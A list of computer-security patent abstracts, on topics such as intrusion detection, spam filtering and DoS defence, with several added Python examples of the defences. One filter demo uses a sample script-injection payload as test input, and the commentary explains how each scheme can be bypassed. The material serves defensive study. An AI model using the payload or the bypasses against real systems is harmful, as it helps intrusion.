20130219493Remote Security Self-Assessment Framework - A system for security self-assessment for a computer platform. The system comprises a memory, a processor, and an application stored in the memory. When executed by the processor, the application in association with a call to action transmits security self-assessment logic and at least one security self-assessment policy to a computer platform, wherein the security self-assessment policy defines at least one scan tool to be used by the security self-assessment logic when executed on the computer platform to perform a security self-assessment of the computer platform. The system further comprises a plurality of scan tools stored in the memory and accessible for downloading by the computer platform. The security self-assessment logic is configured to cause a processor of the computer platform to download at least one scan tool defined by the security self-assessment policy and to perform a security self-assessment.08-22-2013
20100269176Content Playback Apparatus and Content Playback Method - According to one embodiment, a content playback apparatus which acquires desired content from a specific site accessed via a network and plays back the acquired content, comprises a determination module configured to determine, when a data input request is received from a currently accessed site, whether or not the site is at least a site included in the specific site, and a controller configured to generate, when the determination module determines that the currently accessed site is not included in the specific site, a warning that advises accordingly.10-21-2010
20110219447Identification of Unauthorized Code Running in an Operating System's Kernel - Computer implemented methods, system and apparatus for managing execution of a running-page in a virtual machine include associating an execution trace code with the running page by a security virtual machine. The execution trace code generates a notification upon initiation of the execution of the running page by the virtual machine. The notification is received by the security virtual machine running independent of the virtual machine executing the running-page. The running page associated with the execution trace code is validated by the security virtual machine as authorized for execution. An exception is generated if the running-page is not authorized for execution. The generated exception is to prevent the execution of the running page in the virtual machine.09-08-2011
20110219445Methods, Systems and Computer Program Products for Identifying Traffic on the Internet Using Communities of Interest - Methods for identifying wanted traffic on the Internet are provided. The methods include determining a traffic history for a user of the Internet; identifying wanted traffic in a stream of Internet traffic based on the determined traffic history; and prioritizing the identified wanted traffic such that unwanted traffic is assigned a lower priority than the wanted traffic. Related systems and computer program products are also provided.09-08-2011
20110219446INPUT PARAMETER FILTERING FOR WEB APPLICATION SECURITY - Techniques are disclosed for enhancing the security of a web application by using input filtering. An input filter may be configured to process untrusted input data, character by character, and to replace certain characters in text-based input with visually similar characters. This approach may be used to block a specified list of “triggering” characters as they come in and replace them with characters similar in appearance but without the syntactic meaning that triggers an attack or otherwise exploits a vulnerability in a web-application.09-08-2011
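A character-by-character filter of the kind the abstract above describes, as an added example rather than the patent's code. The trigger table (ASCII characters that carry syntactic meaning in HTML, JavaScript and SQL, mapped to look-alike code points) is my own choice. The third function shows the check a practitioner would want before relying on this approach: several of the look-alikes are compatibility or even canonical equivalents of the original, so any Unicode normalization downstream turns them back into the trigger.

```python
import unicodedata

# Assumed mapping: syntactically significant ASCII -> visually similar code points.
HOMOGLYPHS = {
    "<": "\uFF1C",   # FULLWIDTH LESS-THAN SIGN
    ">": "\uFF1E",   # FULLWIDTH GREATER-THAN SIGN
    '"': "\u201D",   # RIGHT DOUBLE QUOTATION MARK
    "'": "\u2019",   # RIGHT SINGLE QUOTATION MARK
    "(": "\uFF08",   # FULLWIDTH LEFT PARENTHESIS
    ")": "\uFF09",   # FULLWIDTH RIGHT PARENTHESIS
    ";": "\u037E",   # GREEK QUESTION MARK, canonically equivalent to ';'
    "&": "\uFF06",   # FULLWIDTH AMPERSAND
    "\\": "\uFF3C",  # FULLWIDTH REVERSE SOLIDUS
}


def filter_input(text, table=HOMOGLYPHS):
    """Walk the untrusted input one character at a time, replacing triggers."""
    return "".join(table.get(ch, ch) for ch in text)


def contains_trigger(text, table=HOMOGLYPHS):
    """True if any character of the trigger set is still present."""
    return any(ch in table for ch in text)


def survives_normalization(text, form, table=HOMOGLYPHS):
    """Filter the text, then apply the given Unicode normalization form (as a
    database, template engine or browser might) and report whether the output is
    still free of triggers."""
    filtered = filter_input(text, table)
    return not contains_trigger(unicodedata.normalize(form, filtered), table)


if __name__ == "__main__":
    payload = '<script>alert("x")</script>'
    print(filter_input(payload))
    for form in ("NFC", "NFKC"):
        print(form, "safe" if survives_normalization(payload, form) else "reverts to triggers")
```

The fullwidth forms fold back to ASCII under NFKC, and U+037E reverts under plain NFC, so this filter only holds where the substituted text is never normalized afterwards. Contextual output encoding remains the primary control; a substitution filter like this is at best a second layer.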
20090265783Method to Enhance Platform Firmware Security for Logical Partition Data Processing Systems by Dynamic Restriction of Available External Interfaces - A system and method to reduce external access to hypervisor interfaces in a computer system, thereby reducing the possibility of attacks. In a preferred embodiment, addresses for calls are used to fill a table, where the addresses are specifically selected for a requesting computer. For example, in one embodiment, a routine searches for the adapter type of a requesting computer and populates the table with calls specific to that type of adapter. Other types of calls are not put in the table. Instead, those calls are replaced by routines that will return an error. In other embodiments, the operating system type is used to determine what addresses are used to populate the table. These and other embodiments are explained more fully below.10-22-2009
20100031357Defending Smart Cards Against Attacks by Redundant Processing - A method is provided which defends a computer program against attacks independently of the complexity of the program. A request to invoke the application is received. A process execution state is set to indicate a first execution. The application is executed in response to the request, and application data and control information calculated by the application is stored while the application is executed. The process execution state is set to indicate a subsequent execution. At least part of the application is executed for at least one subsequent time. Application data and control information calculated by the application during subsequent executions is compared with the data/information stored during the first execution. The comparison is done by operating system services which are responsive to the process execution state. When the comparison shows a discrepancy in the compared application data and control information, appropriate error handling takes place.02-04-2010
20100031355UNVALIDATED PRIVILEGE CAP - A method for securely accessing an executable file object includes a step in which a request from the target process to access the executable file object is received by an operating system component, and the object is examined for validity before access is allowed. For objects that cannot be validated, the process is run with privileges bounded by the privilege cap, if the privilege cap permits execution of the object.02-04-2010
20100031354Distributive Security Investigation - A security investigation system uses a central server to distribute requests for security information regarding an asset, receive responses, and manage the information in the responses in a case object. Requests may be distributed to various servers, each of which may have an agent that may receive the request, search various databases, logs, and other locations, and generate a response. A case object may be continually updated in some embodiments. The case object may be viewed, analyzed, and other requests generated using automated or manual tools. A case object may be sanitized for analysis without compromising sensitive information.02-04-2010
20090282479METHOD AND SYSTEM FOR MISUSE DETECTION - A method and system for discovering inappropriate and/or illegitimate use of Web page content, comprising: monitoring access to a first Web page by a user; comparing information from the first Web page to information from a second known legitimate Web page; and determining whether the first Web page is legitimate based on the compared information.11-12-2009
20100005529PLATFORM VERIFICATION PORTAL - Described are computer-based methods and apparatuses, including computer program products, for a platform verification portal. A plurality of configuration items are stored with each comprising a plurality of verification commands capable of being executed by a verification scanning engine executing a verification scan on a target server to compare a set of actual software or configuration settings of the software against a desired software stack. A plurality of configuration item rules is stored. Execution of one or more verification scanning engines across a selected set of target servers is remotely initiated. A request for configuration items is received from each of the target servers. For each of the target servers a set of configuration items applicable to the target server is dynamically selected. For each of the target servers, a list identifying the set of configuration items is transmitted to the target server for execution by the verification scanning engine.01-07-2010
20100100959SYSTEM AND METHOD FOR MONITORING AND ANALYZING MULTIPLE INTERFACES AND MULTIPLE PROTOCOLS - The present invention is a system and method for providing security for a mobile device by analyzing data being transmitted or received by multiple types of networks. The invention can provide security for many types of network interfaces on a mobile device, including: Bluetooth, WiFi, cellular networks, USB, SMS, infrared, and near-field communication. Data is gathered at multiple points in a given processing pathway and linked by a protocol tracking component in order to analyze each protocol present in the data after an appropriate amount of processing by the mobile device. Protocol analysis components are utilized dynamically to analyze data and are re-used between multiple data pathways so as to be able to support an arbitrary number of network data pathways on a mobile device without requiring substantial overhead.04-22-2010
20090165132SYSTEM AND METHOD FOR SECURITY AGENT MONITORING AND PROTECTION - A security agent monitoring and protection system is provided. A security agent on an end point computing device can be accompanied by or can load into the device's memory at startup one or more independent software processes whose primary function is to directly protect the security agent itself and take protective actions against the end point computing device should a security agent protecting the device become disabled. Protection of the security agent can be achieved in several ways, including installing the security agent with restricted permissions, making it difficult to shut down, restarting the security agent automatically if it is halted without authorization, disabling network connectivity of the end point device if the security agent does not successfully start or restart, protecting executable and dynamic link library (DLL) files of the security agent, and controlling access to the security agent's Component Object Model (COM) interfaces. These protective aspects can also be used by the monitoring agent itself to protect it from unauthorized access or disabling, further providing protection to the device.06-25-2009
20100100957Method And Apparatus For Controlling Unsolicited Messages In A Messaging Network Using An Authoritative Domain Name Server - Methods for controlling unsolicited messages in a messaging network using an authoritative domain name system (DNS) server, in which a requester intending to send an e-mail message to a recipient queries the DNS server associated with the recipient's domain. The response sent from the DNS server is dependent upon a security policy associated with the requester, which results from interrogations to determine the probability that the requester is sending unsolicited messages or spam. A validity factor is set to a first indicator if the request passes or to a second indicator if the request fails. The response from the DNS server provides the network address if the validity factor is set to the first indicator. A suitable not-the-network-address response is sent if the validity factor is set to the second indicator. The authoritative DNS server thereby controls, blocks, or reroutes the message and lightens the load on the recipient's mail server and ISP(s).04-22-2010
20090320130TRAITOR DETECTION FOR MULTILEVEL ASSIGNMENT - One embodiment of the present invention includes a method for traitor tracing that includes performing an inner code traitor tracing on a recovered pirated digital file, the recovered digital file incorporating an inner code for assigning segments of the digital file and an outer code for assigning inner codes to individual digital files. The method also includes extracting partial information regarding the outer code from the inner code tracing. An outer code tracing procedure may then be performed using the partial information.12-24-2009
20100100958VISUAL DISPLAY OF WEBSITE TRUSTWORTHINESS TO A USER - Website trustworthiness is automatically displayed to a user by pre-establishing a user-defined good list identifying one or more known good website addresses. Each known good website address in the user-defined good list has associated therewith at least one user-defined visual characteristic for display. Subsequently, responsive to the user selecting to visit a website address identified in the user-defined good list, the website is displayed for the user and the user-defined visual characteristics associated therewith from the user-defined good list are also concurrently displayed with the website. The user-defined visual characteristics provide the user with a visual indication of website trustworthiness concurrently with display of the website.04-22-2010
20090077661Method and Apparatus for the Reliability of Host Data Stored on Fibre Channel Attached Storage Subsystems - A method for improving the reliability of host data stored on Fibre Channel attached storage subsystems by performing end-to-end data integrity checks. When a read or write operation is initiated, an initial checksum for data in the read/write operation is generated and associated with the data, wherein the association exists through a plurality of layers of software and attached storage subsystems. The initial checksum is passed with the data in the read/write path. When a layer of software in the read/write path receives the initial checksum and data, the layer performs an integrity check of the data, which includes generating another checksum and comparing it to the initial checksum. If the checksums do not match, the read/write operation fails and the error is logged. If the checksums match, the integrity check is repeated through each layer in the read/write path to enable detecting data corruption at the point of source.03-19-2009
20100005527SYSTEM AND METHOD FOR PROVIDING AND HANDLING EXECUTABLE WEB CONTENT - The present invention relates to a system for providing executable web content to a terminal. The present invention provides a system comprising a server, which provides executable web content comprising a declarative language part in a declarative language and a non-declarative part, and a gateway, which receives the executable web content from the server, converts it into a format executable in a web browser of the terminal, and transmits the converted content to the terminal.01-07-2010
20120110664METHOD AND APPARATUS FOR AVOIDING DENIAL OF SERVICE IN WEB-SERVICE BASED SYSTEMS - The disclosure relates to a method for identifying and preventing propagation of a DoS attack on a WS-Notification NotificationBroker by inspecting the subscription request. If the address of the NotificationConsumer identified by the subscription request is equivalent to that of the NotificationBroker, the subscription request is rejected.05-03-2012
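The loopback check in the abstract above, as an added example (not the patent's implementation): pull the wsa:Address out of the Subscribe message's ConsumerReference, reduce both it and the broker's own URLs to a host/port identity, and reject when they coincide. The sample Subscribe message and the broker URLs are constructed; the WS-BaseNotification and WS-Addressing namespace URIs are the published ones.

```python
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET  # parse untrusted SOAP with defusedxml in production

NS = {
    "wsnt": "http://docs.oasis-open.org/wsn/b-2",
    "wsa": "http://www.w3.org/2005/08/addressing",
}
DEFAULT_PORTS = {"http": 80, "https": 443}


def extract_consumer_address(subscribe_xml):
    """Return the wsa:Address of the Subscribe's ConsumerReference, or raise."""
    root = ET.fromstring(subscribe_xml)
    addr = root.find(".//wsnt:ConsumerReference/wsa:Address", NS)
    if addr is None or not (addr.text or "").strip():
        raise ValueError("Subscribe carries no ConsumerReference/Address")
    return addr.text.strip()


def endpoint_identity(url):
    """(host, port) with the host lower-cased and the port made explicit, so that
    'HTTP://Broker.Example.com:80/x/' and 'http://broker.example.com/x' compare equal.
    The path is deliberately ignored: any path on the broker's own listener loops back."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme.lower())
    return (host, port)


def should_reject(subscribe_xml, broker_urls):
    """Reject a subscription whose consumer is the broker itself."""
    consumer = endpoint_identity(extract_consumer_address(subscribe_xml))
    return any(endpoint_identity(b) == consumer for b in broker_urls)


# Constructed Subscribe request pointing the consumer back at the broker.
SUBSCRIBE_LOOPBACK = """<wsnt:Subscribe xmlns:wsnt="http://docs.oasis-open.org/wsn/b-2"
    xmlns:wsa="http://www.w3.org/2005/08/addressing">
  <wsnt:ConsumerReference>
    <wsa:Address>HTTP://Broker.Example.com:80/wsn/NotificationBroker/</wsa:Address>
  </wsnt:ConsumerReference>
</wsnt:Subscribe>"""

BROKER_URLS = ["http://broker.example.com/wsn/NotificationBroker"]  # assumed

if __name__ == "__main__":
    print("reject" if should_reject(SUBSCRIBE_LOOPBACK, BROKER_URLS) else "accept")
```

A literal comparison only catches a consumer address that names the broker directly. The broker's IP addresses, other DNS names for the same host, and a second broker that forwards back to the first all pass this check, so in practice the broker list should include every address it answers on, and a subscription-time challenge to the consumer endpoint is a stronger test than string equivalence.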
20130185791VOUCHING FOR USER ACCOUNT USING SOCIAL NETWORKING RELATIONSHIP - Trusted user accounts of an application provider are determined. Graphs, such as trees, are created with each node corresponding to a trusted account. Each of the nodes is associated with a vouching quota, or the nodes may share a vouching quota. Untrusted user accounts are determined. For each of these untrusted accounts, a trusted user account that has a social networking relationship is determined. If the node corresponding to the trusted user account has enough vouching quota to vouch for the untrusted user account, then the quota is debited, a node is added for the untrusted user account to the graph, and the untrusted user account is vouched for. If not, available vouching quota may be borrowed from other nodes in the graph.07-18-2013
20110271340METHOD AND APPARATUS FOR DETECTING SPOOFED NETWORK TRAFFIC - A method and apparatus for detecting spoofed IP network traffic is presented. A mapping table is created to indicate correlations between IP address prefixes and AS numbers, based on routing information collected from a plurality of data sources. At each interface of a target network, IP address prefixes from a training traffic flow are acquired and further converted into AS numbers based on the mapping table. An EAS (Expected Autonomous System) table is populated by the AS numbers collected for each interface. The EAS table is used to determine if an operation traffic flow is allowed to enter the network.11-03-2011
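The EAS table scheme described above, carried through as an added example rather than the patent's code: a prefix-to-AS mapping with longest-prefix match, a training pass that records which origin ASes are seen on each interface, and a check that flags operational packets whose source AS was never seen there. The mapping, interfaces and flows are constructed; in practice the mapping is derived from routing data such as BGP tables.

```python
import ipaddress

# Constructed stand-in for routing data; real tables have hundreds of thousands of entries.
PREFIX_TO_AS = {
    "198.51.100.0/24": 64500,
    "198.51.100.128/25": 64501,  # more-specific announced by a different origin
    "203.0.113.0/24": 64502,
    "192.0.2.0/24": 64503,
}


def build_lpm_table(mapping):
    """Sort prefixes longest-first so a linear scan yields the longest-prefix match."""
    table = [(ipaddress.ip_network(p), asn) for p, asn in mapping.items()]
    table.sort(key=lambda entry: entry[0].prefixlen, reverse=True)
    return table


def ip_to_as(addr, table):
    """Origin AS for an address, or None for space that no prefix covers."""
    ip = ipaddress.ip_address(addr)
    for net, asn in table:
        if ip in net:
            return asn
    return None


def train_eas(training_flows, table):
    """training_flows: iterable of (interface, source_ip) from a clean training window.
    Returns the EAS table {interface: set of expected origin ASes}."""
    eas = {}
    for iface, src in training_flows:
        asn = ip_to_as(src, table)
        if asn is not None:
            eas.setdefault(iface, set()).add(asn)
    return eas


def is_spoofed(iface, src, eas, table):
    """Flag a packet whose source AS is not expected on its ingress interface.
    Sources that map to no AS are flagged as well: routing data offers no
    legitimate path for them to arrive on any interface."""
    asn = ip_to_as(src, table)
    return asn is None or asn not in eas.get(iface, set())


# Constructed training flow: both 198.51.100.0/24 origins enter on eth0, AS64502 on eth1.
TRAINING = [
    ("eth0", "198.51.100.10"),
    ("eth0", "198.51.100.200"),
    ("eth1", "203.0.113.7"),
]

if __name__ == "__main__":
    lpm = build_lpm_table(PREFIX_TO_AS)
    eas = train_eas(TRAINING, lpm)
    for iface, src in (("eth0", "198.51.100.10"), ("eth1", "198.51.100.10"), ("eth0", "10.0.0.1")):
        print(iface, src, "spoofed" if is_spoofed(iface, src, eas, lpm) else "ok")
```

The EAS table is only trustworthy if the training window was clean: spoofed packets present during training put the spoofed origin AS into the expected set for that interface and whitelist the attacker. Asymmetric routing also produces legitimate packets from an AS not seen in training, so the check is better used to raise an alert than to drop traffic outright.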
20090150996APPLICATION PROTECTION FROM MALICIOUS NETWORK TRAFFIC - A program, method and system for embedding a programmable packet filter into an application to protect the application against malicious network packets are disclosed. Traditional packet filtering techniques to protect against malicious packets designed to exploit defects in applications, based on external packet filtering devices, create a bottleneck in network traffic and present a large overhead cost. In addition, when security vulnerabilities in applications are discovered, traditional application updating methods lack a fast enough turn-around time to protect the application and users' data from attack. These problems can be overcome by embedding a programmable packet filter into the application itself. The application can use the filter to discard malicious network packets. Furthermore, the filter can be updated via configuration files downloaded from the application vendor to update the application's embedded programmable packet filter without having to update the entire program code of the application.06-11-2009
20090070871COMMUNICATION SYSTEM AND METHOD - A method and system for communicating packetized audio or audio-visual communications over a data communications network is disclosed. Packets meeting a predetermined criterion are identified and bypass integrity protection. Integrity protection is applied to all other packets.03-12-2009
20100281538Identification of Content by Metadata - Systems and methods for identifying content in electronic messages are provided. An electronic message may include certain content. The content is detected and analyzed to identify any metadata. The metadata may include a numerical signature characterizing the content. A thumbprint is generated based on the numerical signature. The thumbprint may then be compared to thumbprints of previously received messages. The comparison allows for classification of the electronic message as spam or not spam.11-04-2010
20100281535Electronic message delivery with estimation approaches - Interfaces for message delivery approaches are disclosed. The interface may include pages for administering accounts for senders, pages for administering message processing systems, and pages for viewing information about senders or message processing systems. In another aspect, automatic alert mechanisms are disclosed. The alert mechanisms send a message to one or more users or machines that have been registered to receive alerts. Alerts may be triggered by any event related to a sender, a message, or a message processing system or may be triggered by any other condition or event. In another aspect, techniques for automatically disabling senders are disclosed. The automatic disabling of a sender may be triggered by any event related to a sender, a message, or a message processing system or may be triggered by any other condition or event.11-04-2010
20100122342IDENTIFYING ABNORMAL NETWORK TRAFFIC - A method of identifying traffic within a network representative of an abnormal network condition, including: monitoring a communications link for a high traffic volume level; identifying a domain being the source of the high traffic volume level; identifying within the domain a sending entity transmitting traffic from the domain; using a detector located at or proximate to the domain to invoke a response from the sending entity; wherein a failure by the sending entity to provide the expected response in accordance with a network protocol indicates that the traffic transmitted by the sending entity is traffic representative of an abnormal network condition.05-13-2010
20090094696SCANNING CIRCUIT AND METHOD FOR DATA CONTENT - The present invention relates to a data scanning circuit and method. According to the present invention, a memory circuit stores a plurality of codes. Each code corresponds to a sub-rule. The memory circuit outputs at least a first bit and at least a second bit of each code, respectively, according to a first and a second data item. An operational circuit performs logic operations on the first and second bits, and produces an operated result. A decision circuit decides whether the input data satisfies the scanning rule according to the operated result.04-09-2009
20120240226NETWORK ROUTERS AND NETWORK TRAFFIC ROUTING METHODS - A network router comprising a first communication interface for receiving traffic from a first traffic source and a second communication interface for receiving traffic from a second traffic source, a processor and memory. The processor of the router is to execute instructions stored in the memory to forward data traffic received at the first communication interface according to a first routing policy and to forward data traffic received at the second communication interface according to a second routing policy.09-20-2012
20100088765SYSTEM AND METHOD FOR FILTERING ELECTRONIC MESSAGES USING BUSINESS HEURISTICS - Disclosed are systems and methods for use in filtering electronic messages using business heuristics. In one aspect, a method includes determining whether the electronic message is associated with a desirable business, and adjusting the likelihood of delivering the electronic message to an intended recipient of the message if the electronic message is determined to be associated with the desirable business. In a more specific embodiment, the method further includes assigning a spam-score to the electronic message based on a likelihood that the electronic message is not unwanted by the intended recipient, blocking delivery of the electronic message to the intended recipient when the spam-score does not cross an overall threshold, and delivering the electronic message to the intended recipient based on the adjusted likelihood when the electronic message is determined to be associated with the desirable business.04-08-2010
20100088763Method for Preventing Denial of Service Attacks Using Transmission Control Protocol State Transition - Disclosed is a method of preventing a denial of service (DoS) attack using transmission control protocol (TCP) state transition. The flow of packets transmitted between a client and a server using TCP is monitored to prevent the DoS attack, e.g., SYN flooding, and to efficiently reduce the load on the server and provide more secure service. By applying the method to a firewall, a proxy server, an intrusion detection system, etc., of a server, it is possible to make up for vulnerabilities regarding a DoS attack without disturbing conventional TCP state transition operation and to detect, verify and block DoS attacks abusing the vulnerabilities, thereby providing more secure service.04-08-2010
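An illustration of monitoring TCP state transitions from the client side of a handshake, in the spirit of the abstract above; this is an added example, not the patent's method. The tracker keeps a per-flow state, counts half-open connections per client, drops a SYN once a client exceeds the half-open limit (SYN flooding), expires half-open flows that never complete, and flags packets that arrive in a state where the protocol does not allow them. The packet trace, the limit and the timeout are constructed for the example.

```python
from collections import defaultdict

HALF_OPEN_LIMIT = 3        # assumed: simultaneous half-open flows allowed per client
HALF_OPEN_TIMEOUT = 5.0    # assumed: seconds before an unanswered SYN is forgotten

CLOSED, SYN_RCVD, ESTABLISHED = "CLOSED", "SYN_RCVD", "ESTABLISHED"


def analyze(packets, half_open_limit=HALF_OPEN_LIMIT, timeout=HALF_OPEN_TIMEOUT):
    """packets: list of (timestamp, client_ip, client_port, flags) seen client-to-server.
    Returns one verdict per packet: 'ok', 'flood' (SYN dropped, no state allocated)
    or 'out_of_state' (packet not allowed by the current TCP state)."""
    state = {}                    # (client_ip, client_port) -> server-side state of that flow
    syn_time = {}                 # half-open flows -> time the SYN arrived, for expiry
    half_open = defaultdict(int)  # client_ip -> number of half-open flows
    verdicts = []

    def expire(now):
        for key, t0 in list(syn_time.items()):
            if now - t0 > timeout:
                half_open[key[0]] -= 1
                state[key] = CLOSED
                del syn_time[key]

    for ts, src, sport, flags in packets:
        expire(ts)
        key = (src, sport)
        cur = state.get(key, CLOSED)
        if flags == "SYN":
            if cur != CLOSED:
                verdicts.append("out_of_state")       # SYN on a flow already in progress
            elif half_open[src] >= half_open_limit:
                verdicts.append("flood")              # too many unanswered SYNs from this client
            else:
                state[key] = SYN_RCVD
                syn_time[key] = ts
                half_open[src] += 1
                verdicts.append("ok")
        elif flags == "ACK":
            if cur != SYN_RCVD:
                verdicts.append("out_of_state")       # third handshake step without a SYN
            else:
                state[key] = ESTABLISHED
                del syn_time[key]
                half_open[src] -= 1
                verdicts.append("ok")
        elif flags in ("FIN", "RST"):
            if cur == SYN_RCVD:
                half_open[src] -= 1
                del syn_time[key]
            state[key] = CLOSED
            verdicts.append("ok")
        else:
            verdicts.append("ok" if cur == ESTABLISHED else "out_of_state")
    return verdicts


# Constructed trace: one clean handshake, one client flooding SYNs, one stray ACK.
TRACE = [
    (0.0, "10.0.0.5", 40001, "SYN"),
    (0.1, "10.0.0.5", 40001, "ACK"),
    (1.0, "10.0.0.9", 50001, "SYN"),
    (1.0, "10.0.0.9", 50002, "SYN"),
    (1.0, "10.0.0.9", 50003, "SYN"),
    (1.0, "10.0.0.9", 50004, "SYN"),
    (2.0, "10.0.0.7", 60001, "ACK"),
]

if __name__ == "__main__":
    for pkt, verdict in zip(TRACE, analyze(TRACE)):
        print(pkt, verdict)
```

Keying the half-open count on the client address is what makes this cheap, and also what a spoofing attacker defeats: a flood with randomized source addresses never exceeds the per-client limit, which is why SYN cookies or a global half-open budget are needed alongside per-client tracking.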
20120240225VERIFICATION APPARATUS AND VERIFICATION METHOD - A verification apparatus for verifying a verified apparatus corresponding to a first apparatus included in a plurality of information processing apparatuses includes a storage and a processor. The storage stores captured data acquired by capturing data transmitted and received among the plurality of information processing apparatuses. The processor receives first data transmitted from the verified apparatus. The first data is destined for a second apparatus included in the plurality of information processing apparatuses. The processor extracts, from the storage, second data transmitted from the second apparatus in response to third data transmitted from the first apparatus to the second apparatus. The third data corresponds to the first data. The processor transmits the extracted second data to the verified apparatus.09-20-2012
20110197276SYSTEM AND METHOD FOR VALIDATING AND CONTROLLING APPLICATIONS - A system and method for validating an application and for controlling execution of an application. A plurality of parameters may be computed for an authenticated object and for a tested object. A plurality of comparison and other metrics may be computed based on the computed plurality of parameters. Control of an execution of programs may be based on said metrics. Other embodiments are described and claimed.08-11-2011
20110197275STOPPING AND REMEDIATING OUTBOUND MESSAGING ABUSE - Systems and methods are provided for allowing subscriber message sending profiles to be maintained and used in conjunction with behavior-based anomaly detection techniques and traditional content-based spam signature filtering to enable application of appropriate message disposition policies to outbound subscriber message traffic. According to one embodiment, subscriber profiles are constructed for multiple subscriber accounts associated with a service provider based on outbound message flow originated from the subscriber accounts. Then, possible subscriber account misuse may be discovered by performing behavior-based anomaly detection, including a comparison of a subscriber profile associated with the subscriber account with recent subscriber account usage information, to identify one or more behavioral anomalies in outbound message flow originated from the subscriber account.08-11-2011
20110197274RATE LIMITING DATA TRAFFIC IN A NETWORK - A network device coordinates with other devices in a network to create a distributed filtering system. The device detects an attack in the network, such as a distributed denial of service attack, and forwards attack information to the other devices. The devices may categorize data into one or more groups and rate limit the amount of data being forwarded based on rate limits for the particular categories. The rate limits may also be updated based on the network conditions. The rate limits may further be used to guarantee bandwidth for certain categories of data.08-11-2011
20110202995Single hardware platform multiple software redundancy - A process detects an attack on a software system, eradicates the attack, automatically loads software into the software system in response to the attack, and executes one or more of a reboot of the software system or a boot of the loaded software. The loaded software comprises a substantially similar functionality of at least a portion of the software system and a different implementation of the functionality of the portion of the software system.08-18-2011
20100088764RELAY DEVICE AND RELAY METHOD - An apparatus relays packets transferred over a network and discards an attack packet detected among the packets. The apparatus includes: an inspection-packet outputting unit that outputs, when detecting the attack packet, an inspection packet in which a transmission-source address contained in the attack packet is set as a destination address and a destination address contained in the attack packet is set as a transmission-source address; a filter table storing unit that stores, when acquiring a response packet for the inspection packet, a transmission-source address, a destination address, and identification information of an interface, which has received the response packet, that are contained in the response packet, in a filter table in an associated manner; and a transfer control unit that determines whether to transfer a packet as a transfer object based on the filter table.04-08-2010
20090307772FRAMEWORK FOR SCALABLE STATE ESTIMATION USING MULTI NETWORK OBSERVATIONS - A framework for state estimation using multi-network observation. Highly scalable qualitative probabilistic algorithms may be used to combine noisy, uncertain outputs having multi-modal event data from numerous networks into a relatively accurate and coherent estimate of the system state. Models of disparate networks may be pulled together to result in unified multi-modal event data. Information from multiple networks may be graphed and analyzed.12-10-2009
20100088762APPARATUS AND METHOD FOR MONITORING NETWORK EQUIPMENT - A system that incorporates teachings of the present disclosure may include, for example, a server having a controller to receive a monitoring signal from a network plug-in device where the monitoring signal includes location and identification information associated with the network plug-in device and where the server is remote from the network plug-in device, and determine whether the network plug-in device is in an unauthorized location based at least in part on the monitoring signal. Other embodiments are disclosed.04-08-2010
20100088761CROSS-DOMAIN ACCESS PREVENTION - A method, system, and computer program product for cross-domain access prevention are provided. The method includes detecting a request from a first domain to access a second domain, and applying cross-domain access heuristics to determine whether to allow the request. The cross-domain access heuristics define common ownership characteristics between the first domain and the second domain. The method further includes performing the requested access in response to determining that the request complies with at least one of the cross-domain access heuristics, and blocking the requested access in response to determining that the request fails to comply with the cross-domain access heuristics.04-08-2010
20090049548Semiconductor Device and Method For Preventing Attacks on the Semiconductor Device - The invention relates to a method and to a semiconductor device, comprising means for detecting an unauthorized access to the semiconductor device, wherein the semiconductor device carries out an initialization of the semiconductor device following detection of an unauthorized access, wherein an information item relating to the unauthorized access can be stored by the semiconductor device prior to the initialization, and wherein the stored information item relating to the unauthorized access remains intact following the initialization of the semiconductor device. It is advantageously provided that the stored information item remains intact for a predetermined period of time following disconnection of the semiconductor device from a power supply.02-19-2009
20100083375DETECTION ACCURACY TUNING FOR SECURITY - Aspects of the subject matter described herein relate to tuning detection components of a security system. In aspects, a history of alerts is collected. This history is then used together with knowledge about tunable objects of the system to determine parameters of the tunable objects that can be changed to improve detection of the system. Parameters of tunable objects are adjusted in a simulator that determines an effect on alerts in the history based on the adjusted parameters. A recommendation of one or more tuning actions may be provided together with information regarding the effect of each tuning action.04-01-2010
20090172813Non-Invasive Monitoring of the Effectiveness of Electronic Security Services - Systems for the non-invasive monitoring of the effectiveness of a customer's electronic security services include a test generation engine for generating and launching a denatured attack towards a customer's network. A monitoring and evaluation agent is operatively coupled to the test generation engine and is adapted to monitor and evaluate the denatured attack. A recording and analysis engine is adapted to record and analyze the results of the denatured attack. Other systems and methods are also provided.07-02-2009
20100125910Systems and methods for media authentication - A method and system for authenticating a digital optical medium, such as a CD-ROM, determine whether the medium is an unauthorized copy, or the original. The original media is created, or altered, so as to contain anomalous locations from which the transfer of data is accomplished at different rates than a standard digital copy would exhibit. One implementation of the process involves timing analysis of the differences in data transfer rates, and does not necessarily require the retrying of data reads, nor does the process require the media to exhibit fatal errors, as in conventional approaches. The process can be employed in systems that control access to unauthorized copies, or may be used for other informative purposes. Theft, distribution, and piracy of digital content on optical media, such as computer software (also games, video, audio, e-book content), is often accomplished by copying it directly to another disc using commonly available copy tools and recordable optical media, or the replication of media to another mass manufactured disc. The present invention, which helps to irrefutably identify a unit of optical media as the original, and can correspondingly identify any copy made by any currently available means as such a copy, may prevent an unauthorized individual from making use of any unauthorized copies. This offers significant advantages to content creators who wish to protect their products.05-20-2010
20090049547System for real-time intrusion detection of SQL injection web attacks - A real-time anomaly SQL Injection detection system is provided to detect anomalies specific to the backend Database layer and the Web application layer of a Website. To reduce false alarms, the system correlates abnormal scores for the Database layer and Web application layer to detect and catch different forms of SQL injection attacks. The attacks are detected based on anomalies and not signatures or patterns.02-19-2009
20120233691METHOD, DEVICE AND SYSTEM FOR ALERTING AGAINST UNKNOWN MALICIOUS CODES - A method, a device, and a system for alerting against unknown malicious codes are disclosed. The method includes: detecting characteristics of a packet; judging whether any suspicious code exists in the packet according to a result of the detection; recording a source address of the suspicious code if the suspicious code exists in the packet; and sending alert information that carries the source address to a monitoring device. The embodiments of the present invention can report source addresses of numerous suspicious codes proactively at the earliest possible time, lay a foundation for shortening the time required for overcoming virus threats, and avoid the trouble of installing software on the client.09-13-2012
20090178138Stateless attestation system - A method includes assessing a trustworthiness level of a user computer by communication between the user computer and a first server. A record indicating the trustworthiness level is sent from the first server to the user computer, for storage by the user computer. A request is sent from the user computer to a second server, different from the first server, for a service to be provided to the user computer by the second server. The record is provided from the user computer to the second server by communicating between the user computer and the second server. At the second server, the trustworthiness level is extracted from the record, and the requested service is conditionally allowed to be provided to the user computer depending on the extracted trustworthiness level.07-09-2009
